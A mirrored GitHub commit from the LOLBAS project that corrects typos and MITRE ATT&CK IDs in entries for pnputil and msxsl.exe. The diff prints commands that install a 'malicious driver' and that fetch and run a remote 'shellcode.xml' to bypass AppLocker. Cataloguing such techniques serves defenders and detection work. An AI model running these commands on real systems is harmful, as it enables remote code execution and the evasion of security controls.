mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-28 15:58:24 +01:00
ATT&CK realignment, typo fixes (#178)
* Corrected Mitre TID for pnputil * Fixed Command misspells
This commit is contained in:
parent
f73ce77004
commit
2031916b1a
@ -6,10 +6,10 @@ Created: 2020-12-25
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
|
- Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
|
||||||
Description: Used for installing drivers
|
Description: Used for installing drivers
|
||||||
Usecase: Aadd malicious driver
|
Usecase: Add malicious driver
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1547.006
|
MitreID: T1547
|
||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\system32\pnputil.exe
|
- Path: C:\Windows\system32\pnputil.exe
|
||||||
|
@ -18,14 +18,14 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||||
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||||
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||||
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||||
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
|
Loading…
Reference in New Issue
Block a user